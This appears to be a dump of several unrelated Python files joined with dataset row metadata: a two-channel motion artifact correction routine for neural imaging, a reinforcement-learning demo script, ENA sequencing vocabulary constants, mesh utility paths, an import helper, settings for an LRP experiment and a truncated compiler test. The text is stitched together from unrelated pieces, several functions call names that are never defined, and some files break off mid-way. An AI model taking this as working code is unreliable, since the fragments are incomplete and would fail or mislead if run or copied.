def tmac_ac(red_np, green_np, optimizer='BFGS', verbose=False, truncate_freq=False):
    """ Implementation of the Two-channel motion artifact correction method (TMAC)
    This is tmac_ac because it is the additive and circular boundary version
    This code takes in imaging fluoresence data from two simultaneously recorded channels and attempts to remove
    shared motion artifacts between the two channels
    Args:
        red_np: numpy array, [time, neurons], activity independent channel
        green_np: numpy array, [time, neurons], activity dependent channel
        optimizer: string, scipy optimizer
        verbose: boolean, if true, outputs when inference is complete on each neuron and estimates time to finish
        truncate_freq: boolean, if true truncates low amplitude frequencies in Fourier domain. This should give the same
        results but may give sensitivity to the initial conditions
    Returns: a dictionary containing: all the inferred parameters of the model
    """
    # optimization is performed using Scipy optimize, so all tensors should stay on the CPU
    device = 'cpu'
    dtype = torch.float64
    # reject invalid measurements up front
    red_nan = np.any(np.isnan(red_np))
    red_inf = np.any(np.isinf(red_np))
    green_nan = np.any(np.isnan(green_np))
    green_inf = np.any(np.isinf(green_np))
    if red_nan or red_inf or green_nan or green_inf:
        raise Exception('Input data cannot have any nan or inf')
    # convert data to units of fold mean and subtract mean
    # (i.e. each channel becomes F/mean(F) - 1, zero-centered fold change)
    red_np = red_np / np.mean(red_np, axis=0) - 1
    green_np = green_np / np.mean(green_np, axis=0) - 1
    # convert to tensors and fourier transform
    red = torch.tensor(red_np, device=device, dtype=dtype)
    green = torch.tensor(green_np, device=device, dtype=dtype)
    red_fft = tfo.real_fft(red)
    green_fft = tfo.real_fft(green)
    # estimate all model parameters from the data
    # (activity terms initialized from green, motion terms from red)
    variance_r_noise_init = np.var(red_np, axis=0)
    variance_g_noise_init = np.var(green_np, axis=0)
    variance_a_init = np.var(green_np, axis=0)
    variance_m_init = np.var(red_np, axis=0)
    # initialize length scale using the autocorrelation of the data
    length_scale_a_init = np.zeros(red_np.shape[1])
    length_scale_m_init = np.zeros(red_np.shape[1])
    for n in range(green_np.shape[1]):
        # approximate as the standard deviation of a gaussian fit to the autocorrelation function
        length_scale_m_init[n] = initialize_length_scale(red_np[:, n])
        length_scale_a_init[n] = initialize_length_scale(green_np[:, n])
    # preallocate space for all the training variables
    a_trained = np.zeros(red_np.shape)
    m_trained = np.zeros(red_np.shape)
    variance_r_noise_trained = np.zeros(variance_r_noise_init.shape)
    variance_g_noise_trained = np.zeros(variance_g_noise_init.shape)
    variance_a_trained = np.zeros(variance_a_init.shape)
    length_scale_a_trained = np.zeros(length_scale_a_init.shape)
    variance_m_trained = np.zeros(variance_m_init.shape)
    length_scale_m_trained = np.zeros(length_scale_m_init.shape)
    # loop through each neuron and perform inference
    start = time.time()
    for n in range(red_np.shape[1]):
        # get the initial values for the hyperparameters of this neuron
        # All hyperparameters are positive so we fit them in log space
        evidence_training_variables = np.log([variance_r_noise_init[n], variance_g_noise_init[n], variance_a_init[n],
                                              length_scale_a_init[n], variance_m_init[n], length_scale_m_init[n]])
        # define the evidence loss function. This function takes in and returns pytorch tensors
        # a wrapper function of evidence that takes in and returns numpy variables
        # wrapper function of for Jacobian of the evidence that takes in and returns numpy variables
        # optimization function with Jacobian from pytorch
        # NOTE(review): `evidence_loss_fn_np` and `evidence_loss_jacobian_np` are
        # not defined anywhere in this excerpt -- the comments above suggest they
        # are nested closures (over red/green/n) that were lost when this file was
        # extracted; confirm against the upstream tmac source before relying on
        # this code as-is.
        trained_variances = optimize.minimize(evidence_loss_fn_np, evidence_training_variables,
                                              jac=evidence_loss_jacobian_np,
                                              method=optimizer)
        # calculate the posterior values
        # The posterior is gaussian so we don't need to optimize, we find a and m in one step
        trained_variance_torch = torch.tensor(trained_variances.x, dtype=dtype, device=device)
        a, m = tpd.tmac_evidence_and_posterior(red[:, n], red_fft[:, n], trained_variance_torch[0], green[:, n], green_fft[:, n], trained_variance_torch[1],
                                               trained_variance_torch[2], trained_variance_torch[3], trained_variance_torch[4], trained_variance_torch[5],
                                               calculate_posterior=True, truncate_freq=truncate_freq)
        a_trained[:, n] = a.numpy()
        m_trained[:, n] = m.numpy()
        # hyperparameters were fit in log space, so exponentiate before storing
        variance_r_noise_trained[n] = torch.exp(trained_variance_torch[0]).numpy()
        variance_g_noise_trained[n] = torch.exp(trained_variance_torch[1]).numpy()
        variance_a_trained[n] = torch.exp(trained_variance_torch[2]).numpy()
        length_scale_a_trained[n] = torch.exp(trained_variance_torch[3]).numpy()
        variance_m_trained[n] = torch.exp(trained_variance_torch[4]).numpy()
        length_scale_m_trained[n] = torch.exp(trained_variance_torch[5]).numpy()
        if verbose:
            # timing values are rounded to 3 decimal places for display
            decimals = 1e3
            # print out timing
            elapsed = time.time() - start
            remaining = elapsed / (n + 1) * (red_np.shape[1] - (n + 1))
            elapsed_truncated = np.round(elapsed * decimals) / decimals
            remaining_truncated = np.round(remaining * decimals) / decimals
            print(str(n + 1) + '/' + str(red_np.shape[1]) + ' neurons complete')
            print(str(elapsed_truncated) + 's elapsed, estimated ' + str(remaining_truncated) + 's remaining')
    trained_variables = {'a': a_trained,
                         'm': m_trained,
                         'variance_r_noise': variance_r_noise_trained,
                         'variance_g_noise': variance_g_noise_trained,
                         'variance_a': variance_a_trained,
                         'length_scale_a': length_scale_a_trained,
                         'variance_m': variance_m_trained,
                         'length_scale_m': length_scale_m_trained,
                         }
    return trained_variables
def initialize_length_scale(y):
    """ Function to fit a Gaussian to the autocorrelation of y
    Args:
        y: numpy vector
    Returns: Standard deviation of a Gaussian fit to the autocorrelation of y
    """
    # centered lag positions for the autocorrelation.
    # NOTE(review): `x` is unused in this excerpt -- presumably consumed by the
    # `loss` residual function below, whose definition is missing here.
    x = np.arange(-len(y)/2, len(y)/2) + 0.5
    # z-score first so the autocorrelation amplitude is scale-free
    y_z_score = (y - np.mean(y)) / np.std(y)
    y_corr = np.correlate(y_z_score, y_z_score, mode='same')
    # fit the std of a gaussian to the correlation function
    # initial guess: amplitude = autocorrelation peak, std = 1.0
    p_init = np.array((np.max(y_corr), 1.0))
    # NOTE(review): `loss` is not defined in this excerpt -- presumably a nested
    # residual function (closing over x and y_corr) lost during extraction;
    # confirm against the upstream tmac source.
    p_hat = optimize.leastsq(loss, p_init)[0]
    # return the standard deviation
    return p_hat[1]
| 49.106509 | 156 | 0.662128 |
49c41f791b3306b65a7220115c0864d09f5d6134 | 2,166 | py | Python | demo.py | TianhongDai/esil-hindsight | b7c22da087095610018f281245fd4f622ef190ed | [
"MIT"
] | 5 | 2020-10-14T14:10:27.000Z | 2020-11-23T12:46:08.000Z | demo.py | TianhongDai/esil-hindsight | b7c22da087095610018f281245fd4f622ef190ed | [
"MIT"
] | 5 | 2020-10-14T18:57:37.000Z | 2021-10-21T11:10:12.000Z | demo.py | TianhongDai/esil-hindsight | b7c22da087095610018f281245fd4f622ef190ed | [
"MIT"
] | 1 | 2021-12-01T08:55:28.000Z | 2021-12-01T08:55:28.000Z | from arguments import get_args
import numpy as np
from network.models import MLP_Net
from utils.utils import get_env_params
import torch
import os, gym
"""
script to watch the demo of the ESIL
"""
# process the inputs
if __name__ == '__main__':
    args = get_args()
    # create environment
    env = gym.make(args.env_name)
    # get the environment parameters
    env_params = get_env_params(env)
    # start to create model
    model_path = '{}/{}/model.pt'.format(args.save_dir, args.env_name)
    # policy input is observation + goal; output parameterizes an action distribution
    network = MLP_Net(env_params['obs'] + env_params['goal'], env_params['action'], args.dist)
    # the checkpoint stores weights plus the observation/goal normalization statistics
    network_model, obs_mean, obs_std, g_mean, g_std = torch.load(model_path, map_location='cpu')
    network.load_state_dict(network_model)
    network.eval()
    # start to do the testing
    for i in range(args.demo_length):
        observation = env.reset()
        # start to do the demo
        obs, g = observation['observation'], observation['desired_goal']
        for t in range(env._max_episode_steps):
            if args.render:
                env.render()
            # NOTE(review): `process_inputs` is not defined in this excerpt --
            # presumably it normalizes obs/goal with the stored means/stds and
            # concatenates them; confirm against the full file.
            inputs = process_inputs(obs, g, obs_mean, obs_std, g_mean, g_std, args)
            with torch.no_grad():
                _, pi = network(inputs)
            if args.dist == 'gauss':
                # act deterministically at demo time: use the Gaussian mean
                mean, std = pi
                input_actions = mean.detach().cpu().numpy().squeeze()
            else:
                raise NotImplementedError
            # put actions into the environment
            observation_new, reward, _, info = env.step(input_actions)
            obs = observation_new['observation']
        print('the episode is: {}, is success: {}'.format(i, info['is_success']))
| 40.111111 | 96 | 0.636657 |
49c45451bcf8f4588b0bba3456a64c9403ea4bc6 | 1,071 | py | Python | kickbase_api/models/league_user_stats.py | jhelgert/kickbase-api-python | 6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2 | [
"MIT"
] | 7 | 2020-08-17T07:20:30.000Z | 2022-02-03T19:21:53.000Z | kickbase_api/models/league_user_stats.py | jhelgert/kickbase-api-python | 6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2 | [
"MIT"
] | 4 | 2020-11-01T10:39:11.000Z | 2021-07-30T12:20:52.000Z | kickbase_api/models/league_user_stats.py | jhelgert/kickbase-api-python | 6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2 | [
"MIT"
] | 4 | 2020-11-01T09:12:39.000Z | 2021-08-23T13:25:00.000Z | from datetime import datetime
from kickbase_api.models._transforms import parse_date, parse_key_value_array_to_dict
from kickbase_api.models.base_model import BaseModel
from kickbase_api.models.league_user_season_stats import LeagueUserSeasonStats
| 32.454545 | 104 | 0.655462 |
49c52e67e91490b5205014ce1748575c1b06124d | 9,647 | py | Python | ocradmin/lib/fcrepo/http/interfaces.py | mikesname/ocropodium | a3e379cca38dc1999349bf4e9b5608e81dc54b10 | [
"Apache-2.0"
] | 2 | 2015-03-30T16:36:51.000Z | 2016-06-15T01:39:47.000Z | ocradmin/lib/fcrepo/http/interfaces.py | mikesname/ocropodium | a3e379cca38dc1999349bf4e9b5608e81dc54b10 | [
"Apache-2.0"
] | 2 | 2021-06-10T17:43:54.000Z | 2021-12-13T19:40:08.000Z | ocradmin/lib/fcrepo/http/interfaces.py | mikesname/ocropodium | a3e379cca38dc1999349bf4e9b5608e81dc54b10 | [
"Apache-2.0"
] | 1 | 2015-11-08T00:40:11.000Z | 2015-11-08T00:40:11.000Z | """ Interfaces for FCRepoRequestFactory, FCRepoResponse and FCRepoResponseBody.
"""
from exceptions import NotImplementedError
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
| 35.996269 | 79 | 0.59604 |
49c547bb09c7eed025dfa278cd31af58e1182d17 | 4,397 | py | Python | mesh_utilities.py | qingfengxia/quasi_static_metal_cutting | 9773fc0ea33c290057cb2230365094058216caf0 | [
"AFL-1.1"
] | 2 | 2019-07-18T18:35:31.000Z | 2021-09-12T14:00:58.000Z | mesh_utilities.py | qingfengxia/quasi_static_metal_cutting | 9773fc0ea33c290057cb2230365094058216caf0 | [
"AFL-1.1"
] | 1 | 2020-04-26T04:22:26.000Z | 2020-05-11T08:54:44.000Z | mesh_utilities.py | qingfengxia/quasi_static_metal_cutting | 9773fc0ea33c290057cb2230365094058216caf0 | [
"AFL-1.1"
] | null | null | null | #utf8
from __future__ import print_function, division
import subprocess
import os
import os.path
import sys
import time
default_tmp_mesh_filename = '/tmp/Mesh_1.med'
# salome 9.x may be too new for this script, some version released in 2018 is better
# salome_app = '/media/sf_OneDrive/Salome-9.8.0/salome'
salome_app = '/home/qingfeng/SALOME-9.7.0/salome'
gmsh_app = '/media/sf_OneDrive/gmsh-4.10.2-Linux64/bin/gmsh'
| 43.97 | 120 | 0.705254 |
49c7ae5b76fbf1b02e8d130eadfb4143e44dcc80 | 8,141 | py | Python | cubi_tk/ena_constants.py | eudesbarbosa/cubi-tk | 80c3ef9387f2399f796b2cc445b99781d541f222 | [
"MIT"
] | 3 | 2020-09-23T13:06:41.000Z | 2022-01-14T10:14:20.000Z | cubi_tk/ena_constants.py | eudesbarbosa/cubi-tk | 80c3ef9387f2399f796b2cc445b99781d541f222 | [
"MIT"
] | 65 | 2020-09-23T13:22:41.000Z | 2022-03-17T11:02:42.000Z | cubi_tk/ena_constants.py | eudesbarbosa/cubi-tk | 80c3ef9387f2399f796b2cc445b99781d541f222 | [
"MIT"
] | 4 | 2020-09-25T11:28:45.000Z | 2021-11-01T12:00:13.000Z | """Values for controlled vocabularies from ENA.
Taken from
- https://ena-docs.readthedocs.io/en/latest/submit/reads/webin-cli.html
"""
# Constants for platform definitions.
LS454 = "LS454"
ILLUMINA = "ILLUMINA"
PACBIO_SMRT = "PACBIO_SMRT"
IONTORRENT = "ION_TORRENT"
CAPILLARY = "CAPILLARY"
ONT = "OXFORD_NANOPORE"
BGISEQ = "BGISEQ"
DNBSEQ = "DNBSEQ"
#: Allowed platforms in ENA.
PLATFORMS = (LS454, ILLUMINA, PACBIO_SMRT, IONTORRENT, CAPILLARY, ONT, BGISEQ, DNBSEQ)
# Constants for platforms.
LS454_454GS = "454 GS"
LS454_454GS_240 = "454 GS 20"
LS454_454GS_FLX = "454 GS FLX"
LS454_454GS_FLX_PLUS = "454 GS FLX+"
LS454_454GS_FLX_TITANIUM = "454 GS FLX Titanium"
LS454_454GS_JUNIOR = "454 GS Junior"
ILLUMINA_HISEQX_FIVE = "HiSeq X Five"
ILLUMINA_HISEQX_TEN = "HiSeq X Ten"
ILLUMINA_GA = "Illumina Genome Analyzer"
ILLUMINA_GA2 = "Illumina Genome Analyzer II"
ILLUMINA_GA2x = "Illumina Genome Analyzer IIx"
ILLUMINA_HISCANQ = "Illumina HiScanSQ"
ILLUMINA_HISEQ_1000 = "Illumina HiSeq 1000"
ILLUMINA_HISEQ_1500 = "Illumina HiSeq 1500"
ILLUMINA_HISEQ_2000 = "Illumina HiSeq 2000"
ILLUMINA_HISEQ_2500 = "Illumina HiSeq 2500"
ILLUMINA_HISEQ_3000 = "Illumina HiSeq 3000"
ILLUMINA_HISEQ_4000 = "Illumina HiSeq 4000"
ILLUMINA_ISEQ_100 = "Illumina iSeq 100"
ILLUMINA_MISEQ = "Illumina MiSeq"
ILLUMINA_MINISEQ = "Illumina MiniSeq"
ILLUMINA_NOVASEQ_6000 = "Illumina NovaSeq 6000"
ILLUMINA_NETSEQ_500 = "NextSeq 500"
ILLUMINA_NETSEQ_550 = "NextSeq 550"
PACBIO_RS = "PacBio RS"
PACBIO_RS2 = "PacBio RS II"
PACBIO_SEQEL = "Sequel"
IONTORRENT_PGM = "Ion Torrent PGM"
IONTORRENT_PROTON = "Ion Torrent Proton"
IONTORRENT_S5 = "Ion Torrent S5"
IONTORRENT_S5XL = "Ion Torrent S5 XL"
ABI_AB3730XL = "AB 3730xL Genetic Analyzer"
ABI_AB3730 = "AB 3730 Genetic Analyzer"
ABI_AB3500XL = "AB 3500xL Genetic Analyzer"
ABI_AB3500 = "AB 3500 Genetic Analyzer"
ABI_AB3130XL = "AB 3130xL Genetic Analyzer"
ABI_AB3130 = "AB 3130 Genetic Analyzer"
ABI_AB310 = "AB 310 Genetic Analyzer"
ONT_MINION = "MinION"
ONT_GRIDION = "GridION"
ONT_PROMETHION = "PromethION"
BGI_BGISEQ500 = "BGISEQ-500"
DNB_T7 = "DNBSEQ-T7"
DNB_G400 = "DNBSEQ-G400"
DNB_G50 = "DNBSEQ-G50"
DNB_G400_FAST = "DNBSEQ-G400 FAST"
UNSPECIFIED = "unspecified"
#: Allowed values for instruments in ENA records.
INSTRUMENTS = (
LS454_454GS,
LS454_454GS_240,
LS454_454GS_FLX,
LS454_454GS_FLX_PLUS,
LS454_454GS_FLX_TITANIUM,
LS454_454GS_JUNIOR,
ILLUMINA_HISEQX_FIVE,
ILLUMINA_HISEQX_TEN,
ILLUMINA_GA,
ILLUMINA_GA2,
ILLUMINA_GA2x,
ILLUMINA_HISCANQ,
ILLUMINA_HISEQ_1000,
ILLUMINA_HISEQ_1500,
ILLUMINA_HISEQ_2000,
ILLUMINA_HISEQ_2500,
ILLUMINA_HISEQ_3000,
ILLUMINA_HISEQ_4000,
ILLUMINA_ISEQ_100,
ILLUMINA_MISEQ,
ILLUMINA_MINISEQ,
ILLUMINA_NOVASEQ_6000,
ILLUMINA_NETSEQ_500,
ILLUMINA_NETSEQ_550,
PACBIO_RS,
PACBIO_RS2,
PACBIO_SEQEL,
IONTORRENT_PGM,
IONTORRENT_PROTON,
IONTORRENT_S5,
IONTORRENT_S5XL,
ABI_AB3730XL,
ABI_AB3730,
ABI_AB3500XL,
ABI_AB3500,
ABI_AB3130XL,
ABI_AB3130,
ABI_AB310,
ONT_MINION,
ONT_GRIDION,
ONT_PROMETHION,
BGI_BGISEQ500,
DNB_T7,
DNB_G400,
DNB_G50,
DNB_G400_FAST,
UNSPECIFIED,
)
# Constants for library selection.
LIBSEL_RANDOM = "RANDOM"
LIBSEL_PCR = "PCR"
LIBSEL_RANDOM_PCR = "RANDOM PCR"
LIBSEL_RT_PCR = "RT-PCR"
LIBSEL_HMPR = "HMPR"
LIBSEL_MF = "MF"
LIBSEL_REPEAT_FRACTIONATION = "repeat fractionation"
LIBSEL_SIZE_FRACTIONATION = "size fractionation"
LIBSEL_MSLL = "MSLL"
LIBSEL_CDNA = "cDNA"
LIBSEL_CDNA_RANDOM_PRIMING = "cDNA_randomPriming"
LIBSEL_CDNA_OLIGO_DT = "cDNA_oligo_dT"
LIBSEL_POLYA = "PolyA"
LIBSEL_OLIGO_DT = "Oligo-dT"
LIBSEL_INVERSE_RNA = "Inverse rRNA"
LIBSEL_INVERSE_RNA_SELECTION = "Inverse rRNA selection"
LIBSEL_CHIP = "ChIP"
LIBSEL_CHIP_SEQ = "ChIP-Seq"
LIBSEL_MNASE = "MNase"
LIBSEL_DNASE = "DNase"
LIBSEL_HYBRID_SELECTION = "Hybrid Selection"
LIBSEL_REDUCED_REPRESENTATION = "Reduced Representation"
LIBSEL_RESTRICTION_DIGEST = "Restriction Digest"
LIBSEL_5HETYHLCYTITINE_ANTIBODY = "5-methylcytidine antibody"
LIBSEL_MBD2_PROTEIN_METHYL_CPG_BINDING_DOMAIN = "MBD2 protein methyl-CpG binding domain"
LIBSEL_CAGE = "CAGE"
LIBSEL_RACE = "RACE"
LIBSEL_MDA = "MDA"
LIBSEL_PADLOCK_PROBES_CPATURE_METHOD = "padlock probes capture method"
LIBSEL_OTHER = "other"
LIBSEL_UNSPECIFIED = "unspecified"
#: Allowed library selection strategies for ENA records.
LIBRARY_SELECTIONS = (
LIBSEL_RANDOM,
LIBSEL_PCR,
LIBSEL_RANDOM_PCR,
LIBSEL_RT_PCR,
LIBSEL_HMPR,
LIBSEL_MF,
LIBSEL_REPEAT_FRACTIONATION,
LIBSEL_SIZE_FRACTIONATION,
LIBSEL_MSLL,
LIBSEL_CDNA,
LIBSEL_CDNA_RANDOM_PRIMING,
LIBSEL_CDNA_OLIGO_DT,
LIBSEL_POLYA,
LIBSEL_OLIGO_DT,
LIBSEL_INVERSE_RNA,
LIBSEL_INVERSE_RNA_SELECTION,
LIBSEL_CHIP,
LIBSEL_CHIP_SEQ,
LIBSEL_MNASE,
LIBSEL_DNASE,
LIBSEL_HYBRID_SELECTION,
LIBSEL_REDUCED_REPRESENTATION,
LIBSEL_RESTRICTION_DIGEST,
LIBSEL_5HETYHLCYTITINE_ANTIBODY,
LIBSEL_MBD2_PROTEIN_METHYL_CPG_BINDING_DOMAIN,
LIBSEL_CAGE,
LIBSEL_RACE,
LIBSEL_MDA,
LIBSEL_PADLOCK_PROBES_CPATURE_METHOD,
LIBSEL_OTHER,
LIBSEL_UNSPECIFIED,
)
# Constants for library sources.
LIBSRC_GENOMIC = "GENOMIC"
LIBSRC_GENOMIC_SC = "GENOMIC SINGLE CELL"
LIBSRC_TRANSCRIPTOMIC = "TRANSCRIPTOMIC"
LIBSRC_TRANSCRIPTOMIC_SC = "TRANSCRIPTOMIC SINGLE CELL"
LIBSRC_METAGENOMIC = "METAGENOMIC"
LIBSRC_METATRANSCRIPTOMIC = "METATRANSCRIPTOMIC"
LIBSRC_SYNTHETIC = "SYNTHETIC"
LIBSRC_VIRAL_RNA = "VIRAL RNA"
LIBSRC_OTHER = "OTHER"
#: Allowed library sources for ENA records.
LIBRARY_SOURCES = (
LIBSRC_GENOMIC,
LIBSRC_GENOMIC_SC,
LIBSRC_TRANSCRIPTOMIC,
LIBSRC_TRANSCRIPTOMIC_SC,
LIBSRC_METAGENOMIC,
LIBSRC_METATRANSCRIPTOMIC,
LIBSRC_SYNTHETIC,
LIBSRC_VIRAL_RNA,
LIBSRC_OTHER,
)
# Constants for library strategies.
LIBSTR_WGS = "WGS"
LIBSTR_WGA = "WGA"
LIBSTR_WXS = "WXS"
LIBSTR_RNA_SEQ = "RNA-Seq"
LIBSTR_SSRNA_SEQ = "ssRNA-seq"
LIBSTR_MIRNA_SEQ = "miRNA-Seq"
LIBSTR_NCRNA_SEQ = "ncRNA-Seq"
LIBSTR_FL_CDNA = "FL-cDNA"
LIBSTR_EST = "EST"
LIBSTR_HIC = "Hi-C"
LIBSTR_ATAC_SEQ = "ATAC-seq"
LIBSTR_WCS = "WCS"
LIBSTR_RAD_SEQ = "RAD-Seq"
LIBSTR_CLONE = "CLONE"
LIBSTR_POOLCLONE = "POOLCLONE"
LIBSTR_AMPLICON = "AMPLICON"
LIBSTR_CLONEEND = "CLONEEND"
LIBSTR_FINISHING = "FINISHING"
LIBSTR_CHIP_SEQ = "ChIP-Seq"
LIBSTR_MNASE_EQ = "MNase-Seq"
LIBSTR_DNASE_HYPERSENSITIVITY = "DNase-Hypersensitivity"
LIBSTR_BISULFITE_SEQ = "Bisulfite-Seq"
LIBSTR_CTS = "CTS"
LIBSTR_MRE_SEQ = "MRE-Seq"
LIBSTR_MEDIP_SEQ = "MeDIP-Seq"
LIBSTR_MBD_SEQ = "MBD-Seq"
LIBSTR_TN_SEQ = "Tn-Seq"
LIBSTR_VALIDATION = "VALIDATION"
LIBSTR_FAIRE_SEQ = "FAIRE-seq"
LIBSTR_SELEX = "SELEX"
LIBSTR_RIP_SEQ = "RIP-Seq"
LIBSTR_CHIA_PET = "ChIA-PET"
LIBSTR_SYNTHEETIC_LONG_READ = "Synthetic-Long-Read"
LIBSTR_TARGETED_CAPTURE = "Targeted-Capture"
LIBSTR_TETHERED_CHROMATIN_CONFORMATION_CAPTURE = "Tethered Chromatin Conformation Capture"
LIBSTR_OTHER = "OTHER"
#: Allowed library strategies for ENA records.
LIBRARY_STRATEGIES = (
LIBSTR_WGS,
LIBSTR_WGA,
LIBSTR_WXS,
LIBSTR_RNA_SEQ,
LIBSTR_SSRNA_SEQ,
LIBSTR_MIRNA_SEQ,
LIBSTR_NCRNA_SEQ,
LIBSTR_FL_CDNA,
LIBSTR_EST,
LIBSTR_HIC,
LIBSTR_ATAC_SEQ,
LIBSTR_WCS,
LIBSTR_RAD_SEQ,
LIBSTR_CLONE,
LIBSTR_POOLCLONE,
LIBSTR_AMPLICON,
LIBSTR_CLONEEND,
LIBSTR_FINISHING,
LIBSTR_CHIP_SEQ,
LIBSTR_MNASE_EQ,
LIBSTR_DNASE_HYPERSENSITIVITY,
LIBSTR_BISULFITE_SEQ,
LIBSTR_CTS,
LIBSTR_MRE_SEQ,
LIBSTR_MEDIP_SEQ,
LIBSTR_MBD_SEQ,
LIBSTR_TN_SEQ,
LIBSTR_VALIDATION,
LIBSTR_FAIRE_SEQ,
LIBSTR_SELEX,
LIBSTR_RIP_SEQ,
LIBSTR_CHIA_PET,
LIBSTR_SYNTHEETIC_LONG_READ,
LIBSTR_TARGETED_CAPTURE,
LIBSTR_TETHERED_CHROMATIN_CONFORMATION_CAPTURE,
LIBSTR_OTHER,
)
| 27.59661 | 91 | 0.737624 |
49c885495b8b9d85f2a2df00b05e024d355e6e0a | 1,463 | py | Python | analytics/utils.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | [
"Apache-2.0"
] | 10 | 2015-01-25T20:29:55.000Z | 2020-12-08T21:35:09.000Z | analytics/utils.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | [
"Apache-2.0"
] | 3 | 2018-05-15T06:28:20.000Z | 2021-03-30T17:47:45.000Z | analytics/utils.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | [
"Apache-2.0"
] | 6 | 2017-07-03T16:28:29.000Z | 2020-06-15T19:10:45.000Z | """
Copyright 2012 Numan Sachwani <numan@7Geese.com>
This file is provided to you under the Apache License,
Version 2.0 (the "License"); you may not use this file
except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
# import_string comes form Werkzeug
# http://werkzeug.pocoo.org
def import_string(import_name, silent=False):
    """Imports an object based on a string. If *silent* is True the return
    value will be None if the import fails.

    Simplified version of the function with same name from `Werkzeug`_.

    :param import_name:
        The dotted name for the object to import.
    :param silent:
        If True, import errors are ignored and None is returned instead.
    :returns:
        The imported object (None on failure when *silent* is true).
    """
    # importlib.import_module is the documented replacement for calling
    # __import__() directly, which the Python docs discourage.
    import importlib

    import_name = str(import_name)
    try:
        if '.' in import_name:
            # "pkg.mod.attr" -> import "pkg.mod", then fetch "attr" from it.
            module_name, attr_name = import_name.rsplit('.', 1)
            module = importlib.import_module(module_name)
            try:
                return getattr(module, attr_name)
            except AttributeError:
                # The last component may be a not-yet-imported submodule
                # (the old __import__ fromlist behavior imported it); try
                # importing the full dotted path before giving up.
                return importlib.import_module(import_name)
        return importlib.import_module(import_name)
    except (ImportError, AttributeError):
        if not silent:
            raise
| 32.511111 | 74 | 0.699932 |
49c8b96abc3f198aa66587406ab8b7e9c78fd259 | 31 | py | Python | lemkelcp/__init__.py | pritam-dey3/lemkelcp | 4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e | [
"MIT"
] | 10 | 2019-03-17T19:37:25.000Z | 2022-01-02T04:29:05.000Z | lemkelcp/__init__.py | pritam-dey3/lemkelcp | 4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e | [
"MIT"
] | 1 | 2019-09-25T09:32:49.000Z | 2021-12-28T05:05:55.000Z | lemkelcp/__init__.py | pritam-dey3/lemkelcp | 4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e | [
"MIT"
] | 4 | 2019-02-24T11:49:10.000Z | 2020-06-06T14:07:11.000Z | from .lemkelcp import lemkelcp
| 15.5 | 30 | 0.83871 |
49c93ee339debd703889e1a8187ecdfd356689ca | 1,999 | py | Python | settings.py | ArneBinder/Pytorch-LRP | c17902138f1d560f1f5d38f401ac856e071a5800 | [
"BSD-3-Clause"
] | 117 | 2019-03-19T08:47:03.000Z | 2022-03-31T04:14:51.000Z | settings.py | ArneBinder/Pytorch-LRP | c17902138f1d560f1f5d38f401ac856e071a5800 | [
"BSD-3-Clause"
] | 10 | 2019-09-15T14:59:43.000Z | 2022-03-15T14:18:02.000Z | settings.py | ArneBinder/Pytorch-LRP | c17902138f1d560f1f5d38f401ac856e071a5800 | [
"BSD-3-Clause"
] | 49 | 2019-03-19T08:47:03.000Z | 2021-11-30T01:02:04.000Z | """
Settings for re-running the experiments from the paper "Layer-wise
relevance propagation for explaining deep neural network decisions
in MRI-based Alzheimers disease classification".
Please note that you need to download the ADNI data from
http://adni.loni.usc.edu/ and preprocess it using
https://github.com/ANTsX/ANTs/blob/master/Scripts/antsRegistrationSyNQuick.sh
Please prepare the data, such that you will get three HDF5 files,
consisting of a training, a validation and a holdout (test) set.
Each HDF5 file is required to have 2 datasets, namely X and y,
containing the data matrix and label vector accordingly. We have
included the "Data Split ADNI.ipynb" file as a guideline for data splitting.
Please note that it is highly dependent on the format of your data storage
and needs to be individualized as such.
Furthermore you will need SPM12 https://www.fil.ion.ucl.ac.uk/spm/software/spm12/
in order to access the Neuromorphometrics atlas.
Arguments:
model_path: Path to the trained pytorch model parameters
data_path: Path where the outputs will be stored and retrieved
ADNI_DIR: Path to the root of your downloaded ADNI data
train_h5: Path to the training set HDF5 file
val_h5: Path to the validation set HDF5 file
holdout_h5: Path to the holdout set HDF5 file
binary_brain_mask: Path to the mask used for masking the images,
included in the repository.
nmm_mask_path: Path to the Neuromorphometrics mask. Needs to be
acquired from SPM12. Typically located under
~/spm12/tpm/labels_Neuromorphometrics.nii
nmm_mask_path_scaled: Path to the rescaled Neuromorphometrics mask.
"""
# Fill in each INSERT below with a path string for your environment (see the
# module docstring above for what each key means).  `INSERT` is deliberately
# an undefined name, so importing this file unmodified fails fast with a
# NameError instead of silently running with missing paths.
settings = {
    "model_path": INSERT,
    "data_path": INSERT,
    "ADNI_DIR": INSERT,
    "train_h5": INSERT,
    "val_h5": INSERT,
    "holdout_h5": INSERT,
    # The three entries below ship with defaults and normally need no change.
    "binary_brain_mask": "binary_brain_mask.nii.gz",
    "nmm_mask_path": "~/spm12/tpm/labels_Neuromorphometrics.nii",
    "nmm_mask_path_scaled": "nmm_mask_rescaled.nii"
}
| 40.795918 | 81 | 0.758379 |
49ca8eabe12b4dbe3823135f9cccd4003e5ec8f9 | 274 | py | Python | compiler_test.py | zpcore/ACOW | 9d9186eb28af3e5e1242621457f36d5a7910366a | [
"MIT"
] | null | null | null | compiler_test.py | zpcore/ACOW | 9d9186eb28af3e5e1242621457f36d5a7910366a | [
"MIT"
] | null | null | null | compiler_test.py | zpcore/ACOW | 9d9186eb28af3e5e1242621457f36d5a7910366a | [
"MIT"
] | null | null | null | '''
# Test the compiler
'''
from ACOW import *
# Sample MTL formula exercised by both the lexer and the parser.
data = '''
a1 U[1,2] !a0&G[1,3]a3
'''
print('MTL Formula:',data)
